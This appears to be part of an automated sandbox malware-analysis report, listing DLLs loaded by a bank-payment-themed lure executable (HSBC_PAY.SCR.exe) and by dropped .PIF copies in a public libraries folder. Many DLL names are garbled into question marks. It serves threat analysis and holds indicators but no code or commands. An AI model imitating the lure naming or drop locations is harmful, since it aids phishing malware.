                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
